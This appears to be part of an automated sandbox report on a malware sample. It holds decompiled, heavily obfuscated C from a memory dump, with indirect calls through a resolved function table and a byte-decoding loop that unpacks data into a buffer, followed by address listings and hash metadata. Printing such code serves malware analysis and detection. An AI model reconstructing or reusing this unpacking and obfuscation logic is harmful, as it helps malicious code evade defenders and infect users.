                  					_t418 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20),  *(_t601 - 0x20));
                  					 *_t611 = _t418;
                  					_t86 = _t454 + 0x41d201; // 0x41d201
                  					 *_t611 = _t86;
                  					_t420 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x20),  *(_t601 - 0x24));
                  					_t498 = _t471 & 0x00000000 |  *_t611;
                  					_t621 =  &(_t611[1]);
                  					 *_t621 =  *_t621 + _t559;
                  					_t577 = _t420;
                  					_t421 = _t577 + _t498;
                  					_t579 = 0;
                  					_t500 = _t498 & 0x00000000 ^ (_t421 ^  *_t621 |  *(_t454 + 0x41cc21));
                  					_t424 = _t421;
                  					if(_t500 > _t424) {
                  						_t90 = _t454 + 0x41c532; // 0x41c532
                  						 *_t621 =  *_t621 & 0x00000000;
                  						 *_t621 =  *_t621 | _t90;
                  						_t91 = _t454 + 0x41d201; // 0x41d201
                  						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
                  						 *_t621 =  *_t621 | _t91;
                  						_t451 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t601 - 0x24), _t519);
                  						 *(_t454 + 0x41d32e) =  *(_t454 + 0x41d32e) & 0x00000000;
                  						 *(_t454 + 0x41d32e) =  *(_t454 + 0x41d32e) | _t601 -  *_t621 ^ _t451;
                  						_t601 = _t601;
                  					}
                  					_t622 = _t621 - 0xfffffffc;
                  					 *_t622 =  *_t622 & 0x00000000;
                  					 *_t622 =  *_t622 |  *_t621;
                  					_t100 = _t454 + 0x41d01d; // 0x41d01d
                  					 *_t622 =  *_t622 ^ _t579;
                  					 *_t622 =  *_t622 | _t100;
                  					_t101 = _t454 + 0x41c37d; // 0x41c37d
                  					 *_t622 = _t101;
                  					_t429 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t601 - 0x1c), _t579, _t519);
                  					 *(_t601 - 0x20) = _t579;
                  					 *(_t454 + 0x41c9dc) =  *(_t454 + 0x41c9dc) & 0x00000000;
                  					 *(_t454 + 0x41c9dc) =  *(_t454 + 0x41c9dc) | _t579 & 0x00000000 | _t429;
                  					_t582 =  *(_t601 - 0x20);
                  					_t430 =  *((intOrPtr*)(_t454 + 0x41f060))();
                  					 *_t622 =  *_t622 ^ _t595;
                  					 *_t622 =  *_t622 | _t430;
                  					_t111 = _t454 + 0x41c8c2; // 0x41c8c2
                  					 *_t622 =  *_t622 - _t454;
                  					 *_t622 =  *_t622 + _t111;
                  					_t112 = _t454 + 0x41c737; // 0x41c737
                  					 *_t622 =  *_t622 & 0x00000000;
                  					 *_t622 =  *_t622 ^ _t112;
                  					_t433 =  *((intOrPtr*)(_t454 + 0x41f068))(_t582, _t454, _t595);
                  					 *_t114 = _t433;
                  					_push( *(_t601 - 0x20));
                  					_pop( *_t116);
                  					_t623 = _t622 - 0xfffffffc;
                  					 *(_t601 - 0x20) = _t582;
                  					 *(_t454 + 0x41c606) = _t433 & 0x00000000 |  *_t622;
                  					_t559 =  *(_t601 - 0x20);
                  					 *((intOrPtr*)(_t601 - 8)) = 3;
                  					_t121 = _t454 + 0x41d2fe; // 0x41d2fe
                  					 *(_t601 - 0x1c) = 0;
                  					 *_t623 =  *_t623 | _t121;
                  					_t437 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x1c));
                  					 *_t623 =  *_t623 ^ _t559;
                  					 *_t623 =  *_t623 + _t437;
                  					_t125 = _t454 + 0x41d22a; // 0x41d22a
                  					 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
                  					 *_t623 =  *_t623 | _t125;
                  					_t439 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x24), _t559);
                  					_t502 = _t500 & 0x00000000 |  *_t623;
                  					_t611 =  &(_t623[1]);
                  					 *(_t601 - 0x24) = _t519;
                  					_push(_t502 + _t439);
                  					_t553 =  *(_t601 - 0x24);
                  					_pop(_t440);
                  					 *(_t601 - 0x20) = _t440;
                  					_t504 = _t502 & 0x00000000 ^ (_t440 ^  *(_t601 - 0x20) |  *(_t454 + 0x41c48f));
                  					_t443 =  *(_t601 - 0x20);
                  					if(_t504 > _t443) {
                  						_t136 = _t454 + 0x41d2fe; // 0x41d2fe
                  						 *(_t601 - 0x24) =  *(_t601 - 0x24) & 0x00000000;
                  						 *_t611 =  *_t611 + _t136;
                  						_t140 = _t454 + 0x41d22a; // 0x41d22a
                  						 *(_t601 - 0x20) = 0;
                  						 *_t611 =  *_t611 ^ _t140;
                  						_t443 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t601 - 0x20),  *(_t601 - 0x24));
                  					}
                  					 *_t611 = _t595;
                  					 *(_t454 + 0x41c2cf) = 0 ^ _t443;
                  					_t585 = 0;
                  					 *((intOrPtr*)(_t601 - 0xc)) = 0x11;
                  					_t146 = _t454 + 0x41d09f; // 0x41d09f
                  					 *_t611 =  *_t611 - _t559;
                  					 *_t611 =  *_t611 + _t146;
                  					_t445 =  *((intOrPtr*)(_t454 + 0x41f060))(_t559);
                  					 *(_t601 - 0x24) = _t504;
                  					 *((intOrPtr*)(_t454 + 0x41ce4e)) = _t445;
                  					_t471 =  *(_t601 - 0x24);
                  					 *((intOrPtr*)(_t601 - 0x18)) = 4;
                  					_t152 = _t454 + 0x41c4f7; // 0x41c4f7
                  					 *_t611 =  *_t611 ^ _t471;
                  					 *_t611 =  *_t611 + _t152;
                  					_t362 =  *((intOrPtr*)(_t454 + 0x41f060))(_t471);
                  					 *_t611 = _t553;
                  					 *(_t454 + 0x41c895) = 0 ^ _t362;
                  					_t519 = 0;
                  				}
                  				_t520 = _t519 ^ _t519;
                  				 *_t611 =  *_t611 - _t559;
                  				 *_t611 = _t520;
                  				_t201 = _t454 + 0x41c61d; // 0x41c61d
                  				 *_t611 =  *_t611 ^ _t585;
                  				 *_t611 = _t201;
                  				_t367 =  *((intOrPtr*)(_t454 + 0x41f060))(_t585, _t559, _t362);
                  				 *_t611 = _t367;
                  				_t204 = _t454 + 0x41cf67; // 0x41cf67
                  				 *(_t601 - 0x24) = 0;
                  				 *_t611 =  *_t611 ^ _t204;
                  				_t369 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x24),  *(_t601 - 0x1c));
                  				_pop( *_t208);
                  				_t473 = _t471 & 0x00000000 ^  *(_t601 - 0x24);
                  				 *(_t601 - 0x24) = _t559;
                  				_push(_t473 + _t369);
                  				_t562 =  *(_t601 - 0x24);
                  				_pop(_t370);
                  				_t475 = _t473 & 0x00000000 | _t601 & 0x00000000 ^  *(_t454 + 0x41c5dc);
                  				_t604 = _t601;
                  				if(_t475 > _t370) {
                  					_t213 = _t454 + 0x41c61d; // 0x41c61d
                  					 *(_t604 - 0x1c) = 0;
                  					 *_t611 =  *_t611 ^ _t213;
                  					_t216 = _t454 + 0x41cf67; // 0x41cf67
                  					 *(_t604 - 0x20) = 0;
                  					 *_t611 =  *_t611 | _t216;
                  					_t403 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t604 - 0x20),  *(_t604 - 0x1c));
                  					 *(_t604 - 0x1c) = _t475;
                  					 *((intOrPtr*)(_t454 + 0x41cf4f)) = _t403;
                  					_t475 =  *(_t604 - 0x1c);
                  				}
                  				_t612 =  &(_t611[1]);
                  				 *_t612 = _t475;
                  				_t478 = 0;
                  				 *_t612 = _t520 & 0x00000000 |  *_t611;
                  				_t225 = _t454 + 0x41cef6; // 0x41cef6
                  				 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
                  				 *_t612 =  *_t612 | _t225;
                  				_t229 = _t454 + 0x41ceb9; // 0x41ceb9
                  				 *_t612 =  *_t612 ^ _t604;
                  				 *_t612 =  *_t612 ^ _t229;
                  				_t374 =  *((intOrPtr*)(_t454 + 0x41f068))(_t604,  *(_t604 - 0x1c),  *(_t604 - 0x24));
                  				 *(_t454 + 0x41caf5) =  *(_t454 + 0x41caf5) & 0x00000000;
                  				 *(_t454 + 0x41caf5) =  *(_t454 + 0x41caf5) | _t478 ^  *_t612 | _t374;
                  				_t481 = _t478;
                  				_t613 = _t612 - 0xfffffffc;
                  				_t525 = _t374 %  *(_t604 - 0x18);
                  				 *_t613 =  *_t613 & 0x00000000;
                  				 *_t613 =  *_t613 | _t525;
                  				_t241 = _t454 + 0x41c52d; // 0x41c52d
                  				 *(_t604 - 0x24) = 0;
                  				 *_t613 =  *_t613 ^ _t241;
                  				_t377 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t604 - 0x24), _t481);
                  				 *(_t454 + 0x41d106) =  *(_t454 + 0x41d106) & 0x00000000;
                  				 *(_t454 + 0x41d106) =  *(_t454 + 0x41d106) | _t525 & 0x00000000 | _t377;
                  				_t528 = _t525;
                  				_t530 = _t528 & 0x00000000 ^  *_t613;
                  				_t614 = _t613 - 0xfffffffc;
                  				 *((intOrPtr*)(_t604 - 4)) =  *((intOrPtr*)(_t604 - 4)) - _t530;
                  				 *(_t604 - 0x24) = 0;
                  				 *_t614 =  *_t614 | _t530;
                  				_t253 = _t454 + 0x41c7ee; // 0x41c7ee
                  				 *_t614 =  *_t614 ^ _t562;
                  				 *_t614 =  *_t614 ^ _t253;
                  				_t254 = _t454 + 0x41c513; // 0x41c513
                  				 *(_t604 - 0x20) = 0;
                  				 *_t614 =  *_t614 | _t254;
                  				_t380 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t604 - 0x20), _t562,  *(_t604 - 0x24), _t481);
                  				 *(_t604 - 0x20) = _t585;
                  				 *(_t454 + 0x41c2a8) =  *(_t454 + 0x41c2a8) & 0x00000000;
                  				 *(_t454 + 0x41c2a8) =  *(_t454 + 0x41c2a8) ^ _t585 & 0x00000000 ^ _t380;
                  				_t532 =  *_t614;
                  				_t615 =  &(_t614[1]);
                  				 *(_t604 - 0x1c) = _t380;
                  				 *(_t604 - 0x14) =  *(_t604 - 0x14) & 0x00000000;
                  				 *(_t604 - 0x14) =  *(_t604 - 0x14) | _t380 ^  *(_t604 - 0x1c) ^ _t532;
                  				_t271 = _t454 + 0x41ccc7; // 0x41ccc7
                  				 *(_t604 - 0x24) = 0;
                  				 *_t615 =  *_t615 | _t271;
                  				_t385 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t604 - 0x24));
                  				 *(_t454 + 0x41cca4) =  *(_t454 + 0x41cca4) & 0x00000000;
                  				 *(_t454 + 0x41cca4) =  *(_t454 + 0x41cca4) | _t562 -  *_t615 | _t385;
                  				_t565 = _t562;
                  				_t590 =  *(_t604 - 0x20) & 0x00000000 ^ _t454 & 0x00000000 ^  *(_t604 + 8);
                  				_t457 = _t454;
                  				_t280 = _t457 + 0x41c550; // 0x41c550
                  				 *(_t604 - 0x20) = 0;
                  				 *_t615 =  *_t615 + _t280;
                  				_t387 =  *((intOrPtr*)(_t457 + 0x41f060))( *(_t604 - 0x20));
                  				 *(_t604 - 0x20) = 0;
                  				 *_t615 =  *_t615 + _t387;
                  				_t286 = _t457 + 0x41d34c; // 0x41d34c
                  				 *_t615 = _t286;
                  				_t389 =  *((intOrPtr*)(_t457 + 0x41f060))( *(_t604 - 0x20),  *(_t604 - 0x20));
                  				_t616 = _t615 - 0xfffffffc;
                  				 *_t289 = _t389;
                  				 *(_t604 - 0x24) =  *(_t604 - 0x24) + (0 ^  *_t615);
                  				_push( *(_t604 - 0x24));
                  				_pop(_t390);
                  				_t534 = _t532;
                  				 *(_t604 - 0x1c) = _t534;
                  				_t537 =  *(_t604 - 0x1c);
                  				if( *((intOrPtr*)(_t457 + 0x41ccf8)) > _t390) {
                  					_t296 = _t457 + 0x41c550; // 0x41c550
                  					 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
                  					 *_t616 =  *_t616 + _t296;
                  					_t300 = _t457 + 0x41d34c; // 0x41d34c
                  					 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
                  					 *_t616 =  *_t616 + _t300;
                  					_t390 =  *((intOrPtr*)(_t457 + 0x41f064))( *(_t604 - 0x1c),  *(_t604 - 0x1c));
                  				}
                  				 *(_t604 - 0x24) = _t537;
                  				 *((intOrPtr*)(_t457 + 0x41ce46)) = _t390;
                  				_t540 =  *(_t604 - 0x24);
                  				 *(_t604 - 0x1c) = _t540;
                  				_t310 = _t457 + 0x41cb9d; // 0x41cb9d
                  				 *_t616 =  *_t616 - _t590;
                  				 *_t616 =  *_t616 | _t310;
                  				_t311 = _t457 + 0x41cd17; // 0x41cd17
                  				 *(_t604 - 0x20) =  *(_t604 - 0x20) & 0x00000000;
                  				 *_t616 =  *_t616 | _t311;
                  				_t393 =  *((intOrPtr*)(_t457 + 0x41f068))( *(_t604 - 0x20), _t590);
                  				 *_t616 = _t565 & 0x00000000 | _t540 & 0x00000000 ^ _t590;
                  				 *(_t457 + 0x41d015) = 0 ^ _t393;
                  				_t570 = 0;
                  				_t591 = _t590 - 1;
                  				 *(_t604 - 0x1c) = 0;
                  				_push( *(_t604 - 0x1c));
                  				 *_t616 =  *_t616 | _t457;
                  				do {
                  					 *_t319 = _t570;
                  					_t488 =  *(_t604 - 0x20);
                  					_t489 = _t488 &  *(_t604 - 8);
                  					if(_t489 == 0) {
                  						_t591 = _t591 + 1;
                  						_t393 = _t393 & 0x00000000 ^ (_t570 -  *_t616 |  *(_t604 - 0x18));
                  						_t570 = _t570;
                  						_t457 =  *(_t393 + _t591) & 0x000000ff;
                  					}
                  					 *_t325 =  *((intOrPtr*)(_t604 - 0xc));
                  					_t544 =  *(_t604 - 0x20);
                  					asm("rol edx, cl");
                  					asm("lodsb");
                  					_t393 = _t393 | _t544 & _t457;
                  					 *_t570 = _t393;
                  					_t570 = _t570 + 1;
                  					_t327 = _t604 - 4;
                  					 *_t327 =  *((intOrPtr*)(_t604 - 4)) - 1;
                  				} while ( *_t327 != 0);
                  				_t459 =  *_t616;
                  				_t617 =  &(_t616[1]);
                  				_t329 = _t459 + 0x41cc0b; // 0x41cc0b
                  				 *_t617 =  *_t617 & 0x00000000;
                  				 *_t617 =  *_t617 ^ _t329;
                  				_t330 = _t459 + 0x41cbd0; // 0x41cbd0
                  				 *_t617 =  *_t617 & 0x00000000;
                  				 *_t617 =  *_t617 | _t330;
                  				_t397 =  *((intOrPtr*)(_t459 + 0x41f068))(_t604, _t489);
                  				 *(_t604 - 0x20) = _t489;
                  				 *(_t459 + 0x41d326) =  *(_t459 + 0x41d326) & 0x00000000;
                  				 *(_t459 + 0x41d326) =  *(_t459 + 0x41d326) ^ (_t489 ^  *(_t604 - 0x20) | _t397);
                  				 *(_t604 - 0x1c) = _t459;
                  				return memcpy(_t570, _t591 + 1,  *(_t604 - 0x14));
                  			}
































































































                  0x03053fab
                  0x03053fab
                  0x03053fb1
                  0x03053fb5
                  0x03053fb8
                  0x03053fc1
                  0x03053fc2
                  0x03053fc5
                  0x03053fc8
                  0x03053fd4
                  0x03053fd5
                  0x03053fd9
                  0x03053fe2
                  0x03053fe5
                  0x03053fe8
                  0x03053fee
                  0x03053ff6
                  0x03053ffd
                  0x03054003
                  0x0305400b
                  0x0305400e
                  0x03054015
                  0x03054018
                  0x03054021
                  0x03054024
                  0x0305402d
                  0x03054031
                  0x03054034
                  0x03054037
                  0x0305403d
                  0x03054044
                  0x0305404d
                  0x03054053
                  0x03054056
                  0x0305405f
                  0x03054060
                  0x03054063
                  0x0305406c
                  0x03054073
                  0x03054076
                  0x03054079
                  0x0305407f
                  0x03054086
                  0x0305408c
                  0x03054098
                  0x030540a1
                  0x030540a8
                  0x030540ae
                  0x030540b5
                  0x030540b6
                  0x030540ba
                  0x030540bd
                  0x030540c3
                  0x030540ca
                  0x030540cd
                  0x030540d6
                  0x030540dd
                  0x030540e0
                  0x030540e3
                  0x030540f2
                  0x030540f7
                  0x030540fb
                  0x030540fe
                  0x03054100
                  0x03054103
                  0x0305410e
                  0x03054110
                  0x03054113
                  0x0305411b
                  0x0305411c
                  0x0305411f
                  0x03054128
                  0x0305412f
                  0x03054132
                  0x03054135
                  0x03054135
                  0x03054141
                  0x03054148
                  0x0305414e
                  0x03054153
                  0x0305446d
                  0x03054473
                  0x0305447c
                  0x0305447f
                  0x03054486
                  0x0305448a
                  0x03054493
                  0x03054494
                  0x03054497
                  0x0305449a
                  0x030544a0
                  0x030544a7
                  0x030544ad
                  0x030544b4
                  0x030544b7
                  0x030544bd
                  0x030544c5
                  0x030544cc
                  0x030544d2
                  0x030544d5
                  0x030544dc
                  0x030544e2
                  0x030544e9
                  0x030544ec
                  0x030544f2
                  0x030544fa
                  0x03054501
                  0x03054507
                  0x0305450a
                  0x03054511
                  0x03054517
                  0x0305451e
                  0x03054521
                  0x03054528
                  0x0305452b
                  0x0305452e
                  0x03054534
                  0x0305453c
                  0x03054543
                  0x03054549
                  0x03054549
                  0x03054159
                  0x03054159
                  0x0305415f
                  0x03054169
                  0x0305416c
                  0x03054172
                  0x0305417c
                  0x0305417f
                  0x0305418b
                  0x03054192
                  0x03054198
                  0x03054199
                  0x0305419f
                  0x030541a6
                  0x030541a9
                  0x030541af
                  0x030541b6
                  0x030541b9
                  0x030541c2
                  0x030541c5
                  0x030541ce
                  0x030541d1
                  0x030541dd
                  0x030541e0
                  0x030541e5
                  0x030541e9
                  0x030541ec
                  0x030541ee
                  0x030541fc
                  0x030541fe
                  0x03054201
                  0x03054203
                  0x0305420a
                  0x0305420e
                  0x03054211
                  0x03054217
                  0x0305421e
                  0x03054221
                  0x0305422d
                  0x03054234
                  0x0305423a
                  0x0305423a
                  0x03054240
                  0x03054244
                  0x03054248
                  0x0305424b
                  0x03054252
                  0x03054255
                  0x03054258
                  0x03054261
                  0x03054264
                  0x0305426a
                  0x03054272
                  0x03054279
                  0x0305427f
                  0x03054282
                  0x03054289
                  0x0305428c
                  0x0305428f
                  0x03054296
                  0x03054299
                  0x0305429c
                  0x030542a3
                  0x030542a7
                  0x030542aa
                  0x030542b1
                  0x030542b4
                  0x030542b7
                  0x030542c6
                  0x030542c9
                  0x030542d0
                  0x030542d6
                  0x030542d9
                  0x030542e0
                  0x030542e6
                  0x030542f0
                  0x030542f3
                  0x030542fa
                  0x030542fd
                  0x03054300
                  0x03054306
                  0x0305430d
                  0x03054310
                  0x0305431c
                  0x0305431f
                  0x03054322
                  0x03054329
                  0x0305432a
                  0x0305432d
                  0x0305432e
                  0x0305433d
                  0x0305433f
                  0x03054344
                  0x03054346
                  0x0305434c
                  0x03054353
                  0x03054356
                  0x0305435c
                  0x03054366
                  0x03054369
                  0x03054369
                  0x03054371
                  0x03054378
                  0x0305437e
                  0x0305437f
                  0x03054386
                  0x0305438d
                  0x03054390
                  0x03054393
                  0x03054399
                  0x030543a0
                  0x030543a6
                  0x030543a9
                  0x030543b0
                  0x030543b7
                  0x030543ba
                  0x030543bd
                  0x030543c5
                  0x030543cc
                  0x030543d2
                  0x030543d2
                  0x03054551
                  0x03054555
                  0x03054558
                  0x0305455b
                  0x03054562
                  0x03054565
                  0x03054568
                  0x03054571
                  0x03054574
                  0x0305457a
                  0x03054584
                  0x03054587
                  0x03054593
                  0x03054596
                  0x03054599
                  0x030545a0
                  0x030545a1
                  0x030545a4
                  0x030545b2
                  0x030545b4
                  0x030545b7
                  0x030545b9
                  0x030545bf
                  0x030545c9
                  0x030545cc
                  0x030545d2
                  0x030545dc
                  0x030545df
                  0x030545e5
                  0x030545ec
                  0x030545f2
                  0x030545f2
                  0x030545fe
                  0x03054603
                  0x0305460d
                  0x03054611
                  0x03054614
                  0x0305461a
                  0x03054621
                  0x03054624
                  0x0305462b
                  0x0305462e
                  0x03054631
                  0x0305463d
                  0x03054644
                  0x0305464a
                  0x03054654
                  0x03054657
                  0x0305465b
                  0x0305465f
                  0x03054662
                  0x03054668
                  0x03054672
                  0x03054675
                  0x03054681
                  0x03054688
                  0x0305468e
                  0x03054695
                  0x03054698
                  0x030546a1
                  0x030546a5
                  0x030546af
                  0x030546b2
                  0x030546b9
                  0x030546bc
                  0x030546bf
                  0x030546c5
                  0x030546cf
                  0x030546d2
                  0x030546d8
                  0x030546e0
                  0x030546e7
                  0x030546f2
                  0x030546f5
                  0x030546f8
                  0x03054700
                  0x03054704
                  0x0305470a
                  0x03054710
                  0x0305471a
                  0x0305471d
                  0x03054729
                  0x03054730
                  0x03054736
                  0x03054741
                  0x03054743
                  0x03054744
                  0x0305474a
                  0x03054754
                  0x03054757
                  0x0305475d
                  0x03054767
                  0x0305476a
                  0x03054773
                  0x03054776
                  0x03054781
                  0x03054788
                  0x0305478b
                  0x0305478e
                  0x03054791
                  0x03054792
                  0x03054793
                  0x030547a0
                  0x030547a5
                  0x030547a7
                  0x030547ad
                  0x030547b4
                  0x030547b7
                  0x030547bd
                  0x030547c4
                  0x030547c7
                  0x030547c7
                  0x030547cd
                  0x030547d4
                  0x030547da
                  0x030547dd
                  0x030547ed
                  0x030547f4
                  0x030547f7
                  0x030547fa
                  0x03054800
                  0x03054807
                  0x0305480a
                  0x03054812
                  0x03054819
                  0x0305481f
                  0x03054820
                  0x03054821
                  0x03054828
                  0x0305482b
                  0x0305482e
                  0x0305482f
                  0x03054835
                  0x03054836
                  0x03054839
                  0x0305483b
                  0x03054846
                  0x03054848
                  0x03054849
                  0x03054849
                  0x03054850
                  0x03054856
                  0x03054857
                  0x0305485b
                  0x0305485c
                  0x0305485e
                  0x03054860
                  0x03054861
                  0x03054861
                  0x03054861
                  0x03054868
                  0x0305486b
                  0x0305486e
                  0x03054875
                  0x03054879
                  0x0305487c
                  0x03054883
                  0x03054887
                  0x0305488a
                  0x03054890
                  0x03054898
                  0x0305489f
                  0x030548a8
                  0x030548c1

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e380f32c42c4f0e1bdcf2094019efc4a4f59e296a005b21612e1bc21532986cf
                  • Instruction ID: f61236a98941fb8368e9baa7f09c071671f8e47f6595d4a41f611e45edb513d8
                  • Opcode Fuzzy Hash: e380f32c42c4f0e1bdcf2094019efc4a4f59e296a005b21612e1bc21532986cf
                  • Instruction Fuzzy Hash: 8D4234728442088FEF04DFA4C88A7EEBBF1FF48310F19856ED889AA155D7385525CF69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E03051CD0(void* __ebx, signed int __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4, signed int _a8) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _t326;
                  				signed int _t329;
                  				void* _t331;
                  				void* _t332;
                  				signed int _t336;
                  				signed int _t339;
                  				signed int _t344;
                  				signed int _t345;
                  				signed int _t348;
                  				intOrPtr _t353;
                  				signed int _t356;
                  				signed int _t359;
                  				void* _t361;
                  				void* _t362;
                  				signed int _t367;
                  				signed int _t368;
                  				signed int _t370;
                  				void* _t372;
                  				void* _t373;
                  				void* _t377;
                  				intOrPtr _t378;
                  				intOrPtr _t380;
                  				signed int _t382;
                  				signed int _t385;
                  				signed int _t387;
                  				void* _t389;
                  				signed int _t390;
                  				signed int _t392;
                  				signed int _t395;
                  				void* _t397;
                  				void* _t399;
                  				signed int _t400;
                  				signed int _t415;
                  				signed int _t418;
                  				signed int _t421;
                  				void* _t422;
                  				signed int _t424;
                  				signed int _t427;
                  				signed int _t431;
                  				signed int _t432;
                  				signed int _t434;
                  				signed int _t437;
                  				signed int _t439;
                  				signed int _t441;
                  				signed int _t444;
                  				signed int _t446;
                  				signed int _t453;
                  				signed int _t455;
                  				signed int _t456;
                  				signed int _t457;
                  				signed int _t461;
                  				signed int _t467;
                  				signed int _t470;
                  				signed int _t476;
                  				signed int _t479;
                  				signed int _t482;
                  				signed int _t485;
                  				void* _t489;
                  				signed int _t491;
                  				signed int _t494;
                  				signed int _t497;
                  				signed int _t499;
                  				signed int _t502;
                  				signed int _t504;
                  				signed int _t507;
                  				signed int _t510;
                  				signed int _t513;
                  				void* _t516;
                  				signed int _t518;
                  				signed int _t529;
                  				signed int _t532;
                  				signed int _t535;
                  				signed int _t537;
                  				signed int _t540;
                  				signed int _t543;
                  				signed int _t546;
                  				signed int _t549;
                  				signed int _t552;
                  				void* _t561;
                  				void* _t565;
                  				signed int _t566;
                  				void* _t569;
                  				signed int _t572;
                  				signed int _t576;
                  				signed int* _t577;
                  				signed int* _t578;
                  				signed int* _t579;
                  				signed int* _t580;
                  				signed int* _t581;
                  				signed int* _t582;
                  				signed int* _t583;
                  
                  				_t467 = __edx;
                  				_t422 = __ebx;
                  				_push(__esi);
                  				 *_t576 =  *_t576 & 0x00000000;
                  				 *_t576 =  *_t576 + _t565;
                  				_t566 = _t576;
                  				_t577 = _t576 + 0xfffffff0;
                  				_v20 = 0;
                  				_push(_v20);
                  				 *_t577 =  *_t577 + __ebx + 0x41d081;
                  				_t326 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_push(__esi);
                  				 *(__ebx + 0x41d148) =  *(__ebx + 0x41d148) & 0x00000000;
                  				 *(__ebx + 0x41d148) =  *(__ebx + 0x41d148) | __esi -  *_t577 ^ _t326;
                  				_pop(_t529);
                  				_push(__ebx);
                  				 *_t577 =  *_t577 & 0x00000000;
                  				 *_t577 =  *_t577 + __ebx + 0x41c850;
                  				_push(_v16);
                  				 *_t577 = __ebx + 0x41cbc9;
                  				_t329 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_push(__ebx);
                  				 *_t577 =  *_t577 - __ebx;
                  				 *_t577 = _t329;
                  				_push(__edi);
                  				 *_t577 =  *_t577 ^ __edi;
                  				 *_t577 =  *_t577 + __ebx + 0x41cab2;
                  				_t331 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_pop( *_t15);
                  				_push(__edi);
                  				 *_t17 = _t331;
                  				_v12 = _v12 + (__ecx & 0x00000000 | _v20);
                  				_push(_v12);
                  				_pop(_t332);
                  				_pop(_t497);
                  				_push( *((intOrPtr*)(__ebx + 0x41ca2b)));
                  				_pop( *_t22);
                  				_push(_v16);
                  				_pop(_t431);
                  				if(_t431 > _t332) {
                  					_v20 = 0;
                  					_push(_v20);
                  					 *_t577 =  *_t577 + __ebx + 0x41cbc9;
                  					_push(_v20);
                  					 *_t577 = __ebx + 0x41cab2;
                  					_t421 =  *((intOrPtr*)(__ebx + 0x41f064))();
                  					_v20 = _t431;
                  					 *(__ebx + 0x41ce2d) = 0 ^ _t421;
                  					_t431 = _v20;
                  				}
                  				_t578 = _t577 - 0xfffffffc;
                  				 *_t578 =  *_t578 & 0x00000000;
                  				 *_t578 =  *_t578 |  *_t577;
                  				_v20 = 0;
                  				 *_t578 =  *_t578 ^ _t422 + 0x0041c95a;
                  				_t336 =  *((intOrPtr*)(_t422 + 0x41f060))(_v20, _t566);
                  				_v20 = _t467;
                  				 *(_t422 + 0x41cd3d) = 0 ^ _t336;
                  				_t470 = _v20;
                  				 *_t578 =  *_t578 & 0x00000000;
                  				 *_t578 =  *_t578 ^ _t422 + 0x0041c799;
                  				 *_t578 =  *_t578 ^ _t431;
                  				 *_t578 =  *_t578 ^ _t422 + 0x0041d050;
                  				_t339 =  *((intOrPtr*)(_t422 + 0x41f060))(_t431, _t529);
                  				_v20 = _t529;
                  				 *(_t422 + 0x41d0f6) =  *(_t422 + 0x41d0f6) & 0x00000000;
                  				 *(_t422 + 0x41d0f6) =  *(_t422 + 0x41d0f6) ^ _t529 & 0x00000000 ^ _t339;
                  				_t532 = _v20;
                  				_t579 =  &(_t578[1]);
                  				_v20 = 0;
                  				 *_t579 =  *_t579 + (_t339 & 0x00000000) +  *_t578;
                  				_v16 = _v16 & 0x00000000;
                  				 *_t579 =  *_t579 + _t422 + 0x41c952;
                  				_v16 = 0;
                  				 *_t579 =  *_t579 ^ _t422 + 0x0041cbdd;
                  				_t344 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v16, _v20);
                  				_v20 = _t532;
                  				 *(_t422 + 0x41c459) =  *(_t422 + 0x41c459) & 0x00000000;
                  				 *(_t422 + 0x41c459) =  *(_t422 + 0x41c459) | _t532 - _v20 | _t344;
                  				_t535 = _v20;
                  				_t345 =  *((intOrPtr*)(_t422 + 0x41f068))();
                  				 *_t579 = _t345;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t579 =  *_t579 ^ _t422 + 0x0041c361;
                  				_v16 = _v16 & 0x00000000;
                  				 *_t579 =  *_t579 + _t422 + 0x41c569;
                  				_t348 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v12, _v20);
                  				_v20 = _t470;
                  				 *(_t422 + 0x41ca96) =  *(_t422 + 0x41ca96) & 0x00000000;
                  				 *(_t422 + 0x41ca96) =  *(_t422 + 0x41ca96) | _t470 & 0x00000000 ^ _t348;
                  				_t580 =  &(_t579[1]);
                  				 *(_t422 + 0x41d322) =  *(_t422 + 0x41d322) & 0x00000000;
                  				 *(_t422 + 0x41d322) =  *(_t422 + 0x41d322) | _t566 ^  *_t580 |  *_t579;
                  				_t569 = _t566;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t580 =  *_t580 + _t422 + 0x41c29c;
                  				_v16 = 0;
                  				 *_t580 =  *_t580 + _t422 + 0x41c80d;
                  				_t353 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v12);
                  				_v12 = _v20;
                  				 *((intOrPtr*)(_t422 + 0x41c28c)) = _t353;
                  				_t476 = _v12;
                  				 *_t580 = _t497;
                  				 *_t580 = _t422 + 0x41ce81;
                  				 *_t580 = _t422 + 0x41cad0;
                  				_t356 =  *((intOrPtr*)(_t422 + 0x41f068))(_v20, _v20, _v20);
